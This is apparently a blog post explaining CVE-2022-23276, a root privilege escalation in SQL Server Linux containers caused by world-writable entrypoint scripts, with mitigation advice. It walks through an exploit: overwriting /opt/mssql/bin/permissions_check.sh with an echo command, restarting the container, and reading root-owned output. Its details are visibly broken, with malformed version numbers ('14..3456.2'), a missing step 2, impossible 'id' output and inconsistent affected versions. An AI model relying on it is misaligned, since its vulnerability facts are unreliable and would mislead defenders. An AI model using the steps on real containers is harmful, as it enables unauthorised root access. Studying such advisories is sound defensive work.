CVE-2022-23276 - SQL Server for Linux Containers Elevation of Privilege Vulnerability Explored

In the world of cloud and containerized deployments, Microsoft’s SQL Server for Linux has gained traction among developers and organizations that want the power of SQL Server in more flexible environments. But security is always a top concern, and in early 2022, a critical issue—CVE-2022-23276—was discovered, exposing SQL Server in Linux containers to the risk of elevation of privilege. In this long read, we’ll break down what happened, how the exploit works, and what you can do to stay protected. We’ll use simple language and code snippets to illustrate the vulnerability, and provide direct links to official references.

What Is CVE-2022-23276?

CVE-2022-23276 is an Elevation of Privilege (EoP) vulnerability affecting SQL Server’s Linux container images. Specifically, anyone with local access to a container running SQL Server could escalate their privileges, possibly gaining unauthorized access and control.

CVSS Score: 8.8 (High)  
Affected versions:

SQL Server 2017 for Linux containers, versions prior to 14..3456.2 (CU30)

Official Microsoft Advisory:  
Microsoft Security Update Guide - CVE-2022-23276

How Does the Vulnerability Work?

Linux containers usually isolate processes, but sometimes misconfigurations or legacy practices can leak privileges. In the vulnerable versions, the way SQL Server’s container startup script handled file permissions allowed for accidental permission escalation.

Key issue:  
The entrypoint script used by the SQL Server Linux container image could be exploited to execute commands as root when the container was launched.

Entry point scripts are writable by non-root (e.g. group or world write permissions).

- An attacker who gains access inside the container could replace or modify scripts, then restart the container, running arbitrary code as root.

1. Identify the Vulnerable Script

The SQL Server Docker image often uses an entrypoint like /opt/mssql/bin/permissions_check.sh.

Check permissions

ls -l /opt/mssql/bin/permissions_check.sh

Output may look like:

-rwxrwxrwx 1 mssql mssql 2925 Jan 1  2022 /opt/mssql/bin/permissions_check.sh

Notice the global write permission (-rwxrwxrwx).

Inside the running container, attacker overwrites the script

echo 'id > /tmp/hacked_by_cve23276.txt' > /opt/mssql/bin/permissions_check.sh

3. Restart the SQL Server Process

When the container or process restarts, the vulnerable script will be executed with root privileges!

Now, attacker checks the output

cat /tmp/hacked_by_cve23276.txt

Expected output:

uid=(root) gid=(root) groups=(root)

This means arbitrary code execution as root—the ultimate EoP.

Exploit Details

What does this mean?

Conditions required

- Attacker must have access inside the container or the ability to alter its contents (e.g., via web shells, SQL injection with file write, etc.).

Restarting the container may be required.

Notably:  
This is less about a buffer overflow or low-level bug—it's about bad permissions on critical files in the image.

Mitigation

Microsoft Patch:  
Microsoft fixed this issue by updating permissions on critical scripts and changing their container user model. Upgrade to the latest CU (Cumulative Update):

SQL Server 2017: Version 14..3456.2 (CU30) or later

Download fixed images:  
- SQL Server 2019 Linux container tags
- SQL Server 2017 Linux container tags

Audit your images for misconfigurations:

find /opt/mssql/bin -perm /022 -type f

This lists any files in the bin folder that are world- or group-writable.

References & Further Reading

- Microsoft Security Update Guide - CVE-2022-23276
- NIST NVD Entry for CVE-2022-23276
- Official SQL Server Linux Docker Image
- SQL Server Release Notes

Conclusion

CVE-2022-23276 was a classic example of privileges accidentally leaking in containerized environments. The fix was simple—set correct file permissions and upgrade your images! But as containerization spreads, it’s a reminder to review base images, scripts, and deployment practices for possible privilege escalation. Patch your SQL Server Linux containers, keep your images up to date, and always check file permissions!

If you want to check your setup today, go through the examples in this post, and if in doubt, pull the latest Microsoft container images so your data stays safe.


Got questions about this vulnerability or need more help hardening your SQL Server containers? Let me know in the comments!

Timeline

Published on: 02/09/2022 17:15:00 UTC
Last modified on: 02/14/2022 18:40:00 UTC